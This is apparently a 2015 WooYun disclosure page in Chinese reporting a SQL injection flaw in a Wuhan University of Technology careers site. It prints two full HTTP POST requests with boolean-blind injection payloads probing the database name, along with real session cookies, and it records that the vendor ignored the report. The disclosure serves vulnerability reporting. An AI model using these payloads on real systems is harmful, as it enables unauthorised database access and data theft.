当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149649

漏洞标题:武汉理工大学某站存在SQL注入漏洞

相关厂商:武汉理工大学

漏洞作者: miracle

提交时间:2015-10-27 09:23

修复时间:2015-11-01 09:24

公开时间:2015-11-01 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /quxiang/index.asp?niandu=2015&qiyexingzhi=&shengshi=&xueli=&xueyuan=&zhuanye=%CD%C1%C4%BE%B9%A4%B3%CC%BD%A8%D4%EC%D3%EB%B9%DC%C0%ED HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://scc.whut.edu.cn
Cookie: ASP.NET_SessionId=e4ocho55rcn1li55xou13b55; Hm_lvt_5abcacf3da660d5e5fbd8a2a02d45e31=1445691622,1445691653,1445691792,1445691814; Hm_lpvt_5abcacf3da660d5e5fbd8a2a02d45e31=1445691814; CNZZDATA5493968=cnzz_eid%3D876393516-1445686809-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1445686809; HMACCOUNT=CE6C090170ACFF27; hcdI_2132_saltkey=QN2Gnx6H; hcdI_2132_lastvisit=1445687995; hcdI_2132_lastact=1445691595%09api.php%09js; vjliuxing=%5B%7B%22title%22%3A%22%E6%B9%96%E5%8C%97%E9%AB%98%E6%A0%A1%E6%AF%95%E4%B8%9A%E7%94%9F%E5%B0%B1%E4%B8%9A%E6%9C%8D%E5%8A%A1%E6%9C%88%22%2C%22url%22%3A%22http%3A%2F%2Fscc.whut.edu.cn%2Fvjread.aspx%3Fvj%26id%3Da355e175-6f2d-46fc-9f6e-2795b39a3ec3%22%7D%5D; ncss_stusite=0%40%4042%40%4010497%40%40%E6%AD%A6%E6%B1%89%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%40%40%E6%AD%A6%E6%B1%89%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%E4%B8%80%E7%AB%99%E5%BC%8F%E6%9C%8D%E5%8A%A1%E7%B3%BB%E7%BB%9F; BIGipServersanheyi=219130048.20480.0000; ASPSESSIONIDAQQACBDC=PGEJFBMBBINLKHPOFKODEFON
Host: scc.whut.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
dwmc=-1'%20OR%20len(db_name())=7%20AND%20000863%3d000863%20or%20'bSUoI4gL'%3d'

为真时页面有搜索结果,db长度为7:

11.png

为假时,页面没有搜索结果:

22.png


#db的第一位为w,ascii应该是被过滤掉了,连续点2次就挂掉了,所以不用ascii了:

POST /quxiang/index.asp?niandu=2015&qiyexingzhi=&shengshi=&xueli=&xueyuan=&zhuanye=%CD%C1%C4%BE%B9%A4%B3%CC%BD%A8%D4%EC%D3%EB%B9%DC%C0%ED HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://scc.whut.edu.cn
Cookie: ASP.NET_SessionId=e4ocho55rcn1li55xou13b55; Hm_lvt_5abcacf3da660d5e5fbd8a2a02d45e31=1445691622,1445691653,1445691792,1445691814; Hm_lpvt_5abcacf3da660d5e5fbd8a2a02d45e31=1445691814; CNZZDATA5493968=cnzz_eid%3D876393516-1445686809-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1445686809; HMACCOUNT=CE6C090170ACFF27; hcdI_2132_saltkey=QN2Gnx6H; hcdI_2132_lastvisit=1445687995; hcdI_2132_lastact=1445691595%09api.php%09js; vjliuxing=%5B%7B%22title%22%3A%22%E6%B9%96%E5%8C%97%E9%AB%98%E6%A0%A1%E6%AF%95%E4%B8%9A%E7%94%9F%E5%B0%B1%E4%B8%9A%E6%9C%8D%E5%8A%A1%E6%9C%88%22%2C%22url%22%3A%22http%3A%2F%2Fscc.whut.edu.cn%2Fvjread.aspx%3Fvj%26id%3Da355e175-6f2d-46fc-9f6e-2795b39a3ec3%22%7D%5D; ncss_stusite=0%40%4042%40%4010497%40%40%E6%AD%A6%E6%B1%89%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%40%40%E6%AD%A6%E6%B1%89%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%E4%B8%80%E7%AB%99%E5%BC%8F%E6%9C%8D%E5%8A%A1%E7%B3%BB%E7%BB%9F; BIGipServersanheyi=219130048.20480.0000; ASPSESSIONIDAQQACBDC=PGEJFBMBBINLKHPOFKODEFON
Host: scc.whut.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
dwmc=-1'%20OR%20substring(db_name(),1,1)='w'%20AND%20000863%3d000863%20or%20'bSUoI4gL'%3d'

55.png


可以证明存在注入而且还可以获取数据~

漏洞证明:

修复方案:

版权声明:转载请注明来源 miracle@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-01 09:24

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无